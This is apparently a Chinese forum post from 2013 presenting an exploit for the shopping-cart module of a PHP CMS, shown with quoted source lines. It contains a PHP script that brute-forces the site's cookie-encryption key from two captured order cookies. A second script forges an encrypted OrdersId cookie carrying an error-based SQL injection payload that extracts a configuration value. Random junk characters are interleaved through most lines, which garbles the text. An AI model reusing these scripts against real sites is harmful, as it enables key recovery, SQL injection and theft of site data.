www.xxx.com/plus/search.php?keyword=
3 a9 B1 c& ~ T: `在 include/shopcar.class.php中# E* F( v6 g) B
先看一下这个shopcar类是如何生成cookie的4 F$ W( n5 F6 r5 Q& P
239 function saveCookie($key,$value)+ ?* M, k+ O" X% _' _
240 {% P7 E$ ^5 A. X* E% t
241 if(is_array($value))
; j! Z4 U8 o; i2 o242 {
4 `- l% j- Z' w q# z4 L243 $value = $this->enCrypt($this->enCode($value)); [+ e" }* [$ U+ N0 b' Z+ l4 E
244 }" W& h- R& E; p; }
245 else
$ b1 l6 v1 M1 O9 u- X* f246 {
% @6 N% J' c2 K" e7 H4 V9 o247 $value = $this->enCrypt($value);; @' m! U" U: c2 r6 w3 Z* [; c
248 }0 B% }9 m. o3 s+ p; w/ Y. z% _6 k* T3 `
249 setcookie($key,$value,time()+36000,’/');
8 v, y9 e I6 b0 K250 }
2 r( \( ] a; ?9 M" Q简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数2 C! j( D0 Y- Y- S* g u( p
186 function enCrypt($txt)" [8 C" u2 r) R
187 {5 q; q* t9 Z$ \: b2 P/ X1 I
188 srand((double)microtime() * 1000000);
1 b D" C/ h( h A2 O189 $encrypt_key = md5(rand(0, 32000));
5 Y# S8 U( I/ s( n! ]6 L190 $ctr = 0;
e0 e4 F/ T) w8 {% L$ v @3 d: ^; J191 $tmp = ”;( l" {+ Z- A1 u1 a
192 for($i = 0; $i < strlen($txt); $i++)
% t5 {3 U9 j5 V% F7 E1 C193 {
/ s% D! o0 _: T194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, n q+ L) ~0 O6 T, x195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);2 A3 h2 }7 W2 J+ y6 d. H3 Y
196 }! [" a2 a& z0 I) r& @9 q) p- w
197 return base64_encode($this->setKey($tmp)); ]3 a/ y& V( N4 F
198 }
& i( W, ]4 g% ?- O213 function setKey($txt)
4 D6 q, v: h+ V' J% m3 O" S/ ~214 {& i/ r3 M( a V' R {0 \) T
215 global $cfg_cookie_encode;: |& ~1 A! L; G$ t' o) y: B) X* b
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
! B9 |) q' ]6 v9 R217 $ctr = 0;2 O/ b; G; w8 @" L* @5 Q
218 $tmp = ”;
6 Y/ Z2 [4 p- V7 [219 for($i = 0; $i < strlen($txt); $i++)# q# A# R9 m3 F& j; H% {
220 {
) m. V! ^- n+ u/ Y8 [+ P6 |221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# `- F- }6 V' D2 E O222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];( R9 g% Q( a u0 }
223 }) n. V/ V; W7 E2 n( l
224 return $tmp;
' v6 I! C2 S0 {/ y( M7 g7 d225 }# L" {9 N* Y3 q3 u
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
- S: [) @; z; M3 {4 p; X然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
& L" `5 a# T- x) l具体代码如下:
! R/ G3 Y2 a- z2 a<?php: G# \+ K# A( b
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
4 l+ r; p" z. R6 v$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here* w$ @3 X* P7 T! }+ {
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
. ]# V9 C$ U9 k- A% Ofunction reStrCode($code,$string)2 e7 L4 \9 E3 \ S& D+ l/ m
{
. C+ ?& Z2 v% b3 @- {4 ?$code = base64_decode($code);* J1 h# Q" h: U# a
$key = “”;! }% F- B5 y2 l& ?$ z1 d; z$ f( I0 a
for($i=0 ; $i<32 ; $i++)
) @0 E" K- D. N0 J8 ~{
% M% B$ b; i: T7 O$ Q$key .= $string[$i] ^ $code[$i];
5 I5 G/ A( p. x. R5 w}
5 q9 j8 c1 O: F. R' _. P yreturn $key;
9 P# |/ K% v' u* C0 M}
8 {& [: V) J/ v7 a/ sfunction getKeys($cookie,$plantxt)% }8 g- _$ N0 r7 ?: ~
{
( Q4 j5 V7 H4 j9 V6 ]' y5 e5 m$tmp = $cookie;. C, h+ Y/ ]7 J: ]6 p$ r5 [
$results = array();
3 o' g, B- S: J6 d0 o3 e4 d" x. Z& ffor($j=0 ; $j < 32000; $j++)
" g+ T/ f& n/ ]3 O{
" v1 v$ t* w+ p4 y# f8 ]3 f% I: z+ l3 B* Q7 C
$txt = $plantxt;5 L! p5 n5 K) Q( _ b' C
$ctr = 0;$ E; F$ L4 `& @6 g: ~8 G" ?
$tmp = ”;
( ]5 S0 X. h( }0 Q9 O$encrypt_key = md5($j);
# Y2 k; t" d0 r1 o+ _( Cfor($i =0; $i < strlen($txt); $i ++)
/ h% c! X6 A+ {# Y& K{
3 }4 O; i5 S8 m0 m2 N7 P/ y$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
" Y1 x U% L6 V$ F$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
: P. P( {' k9 |- L0 l}
/ s5 q( F$ v) Z* J$string = $tmp;
- X9 @! `' h5 x. q: N$code = $cookie;( b h+ W' m3 y7 d
$result = reStrCode($code,$string);
/ I# S1 R c) x d. A' xif(eregi(‘^[a-z0-9]+$’,$result))
4 K* G% D& }9 u1 H$ W{
' A# t" R' r& s* s5 c/ ^% M* jecho $result.”\n”; }/ \; g. i! I1 }
$results[] = $result;
1 ]7 m& B. a% B1 ?5 L( q}
. V0 k! N; R: G. M2 i8 ~) ]8 p; X}! n2 s% t/ j+ c
return $results;
$ N$ x; f: y& C" P}9 Z9 s8 X# ?6 I+ v0 s" f
$results1 = getKeys($cookie1,$plantxt);
}4 L+ p3 I6 S5 S/ g" a$results2 = getKeys($cookie2,$plantxt);
9 t2 d; `/ `# p8 @+ v" |, bprint “\n——————–real key————————–\n”;# }8 k- L# g9 z+ { C T
foreach($results1 as $test1) e e. y2 Z: r& s
{* j5 k6 b- r- V+ V8 T t+ f' e
foreach($results2 as $test2)+ U3 s2 H; N# p/ E# M7 }
{
, a& T) h7 C! w# Mif($test1 == $test2)
7 u2 p; A. y k$ P/ W: k8 h4 m7 P{
- n8 U3 U! N E1 q* y4 w4 iecho $test1.”\n”;" L. h9 J) D, k& j, N8 p
}
* G# u( U- q$ V}5 W) w3 v) r9 }1 V
}
, \. `3 K3 P# I6 K?>2 q+ |, p H. H) R3 W, W% _
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
1 ^# Y& _3 H1 r3 } |+ bplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1" y. I% F* M/ w, Q- A6 z, f
然后推算出md5(strtolower($cfg_cookie_encode)) ]- H3 o. i: M2 r/ T
得到这个key之后,我们就可以构造任意购物车的cookie
7 N( t& l; |, k4 H5 j接着看
/ ~$ G+ p$ X' l20 class MemberShops" K8 u2 \3 [3 T/ p& Q/ @$ [
21 {$ s, p4 j I- F% x
22 var $OrdersId;
" U/ @- \4 _" f3 h# O# b23 var $productsId;
2 w) B( N+ ~4 l% x9 g6 A+ } G24
: S* A2 Q# R: O% i: q* E25 function __construct()! c- D' Z# O/ }$ y3 ?5 i
26 {- ?# {! X* T4 s% U# M3 h9 K/ C
27 $this->OrdersId = $this->getCookie(“OrdersId”);! a% w9 T* t8 c9 y; T, H0 p2 F/ ]
28 if(empty($this->OrdersId))
" g. i& X+ S+ @( y" p7 z! u1 {; X29 {
1 N$ {1 `" a. r, F30 $this->OrdersId = $this->MakeOrders();1 _( }8 V6 u. z+ E7 }/ L3 G
31 }
9 V+ k3 X) Q$ {" e6 E32 }
# A5 B- ]0 M6 k d" J3 N发现OrderId是从cookie里面获取的
4 R6 L) i7 ?0 J: b然后1 u$ F5 I- u/ _: E. o
/plus/carbuyaction.php中的 b M! o* R$ c6 L& l( W$ b
29 $cart = new MemberShops();
- h* t: z# @, p1 @. d39 $OrdersId = $cart->OrdersId; //本次记录的订单号
+ ~1 p; b, }# @% A……
4 q+ n, ?& y5 m9 f6 W173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);% e/ G! l; m4 G q
接着我们就可以注入了
# `- @1 r3 F+ s2 C2 e0 C通过利用下面代码生成cookie:5 y3 H" _0 d N8 N" s8 R2 w
<?php
! p( q6 e7 Z9 a5 L" F$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
c/ Q) t1 [ Q5 y$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
9 Y, k/ S% ^' I( D* Efunction setKey($txt)
! v3 _! S7 p4 X5 a3 e/ ?; P! [{' s: a5 u O6 m1 q( ~1 S
global $encrypt_key;) l0 ^+ o4 C5 Y' u! d# I7 x$ I0 s4 W
$ctr = 0;4 Z" k; d: L: |) X5 G8 h9 k- G- {
$tmp = ”;7 }! C8 f8 k1 N
for($i = 0; $i < strlen($txt); $i++)
; H7 h3 p( S1 m7 ?- A8 Q{
! P+ E# w5 {$ u+ p4 v. L& q l7 b* `$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 \4 u) P- f" y* W* ?' h% r$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];: \- `, `- c/ I
}+ }7 k9 K1 T* O+ j# r+ C
return $tmp;" }1 D( ~* Q4 q% a3 k/ r
}
. ]1 Z# |& w0 X, b, T- ofunction enCrypt($txt)8 L9 Y$ ~5 C4 W$ `" n& \
{
- [9 J# n6 @1 C* y+ p. asrand((double)microtime() * 1000000);
K! n( L: C+ H- i2 A3 l( s- [$encrypt_key = md5(rand(0, 32000));
. A% Z. q' u3 X* _$ L! Q; m# Z; e1 o$ctr = 0;
! k1 D" _0 Z# |, ^) d% t# Q$tmp = ”;
, |1 g6 h& b0 \+ e! g0 n) H5 o \" ]for($i = 0; $i < strlen($txt); $i++). t/ q5 m4 D$ N" G
{# ^8 [+ \( K/ t$ K5 N6 G" e
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 G( w+ ]6 w" g& H0 D6 n! P
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);* i8 O& h; U" R& e+ O( C+ M
}( ~* |' E' b$ F* X7 B+ A' A5 H
return base64_encode(setKey($tmp));
' M6 a" e9 V% @( M}# d1 }3 [' k, a. x+ e# M
for($dest =0;$dest = enCrypt($txt);)8 t/ J$ H- l: g* v X
{
) B, Q4 G8 t6 T* a( vif(!strpos($dest,’+'))
3 v# M0 F- _ U* ^$ g& [{
5 R2 q: r S# Ebreak;
$ P5 S" n) \7 x} a! o$ @ R$ J' ]# l; r
}- u _( ~& F- { I% i# c" r" |0 G
echo $dest.”\n”;
: M# R, k/ I6 U1 M+ Q?>
* c+ m: O6 N# ?( f2 J }# W5 \" g/ G Q, l4 |
|
发表于 2013-2-13 23:58:29
收藏
支持
反对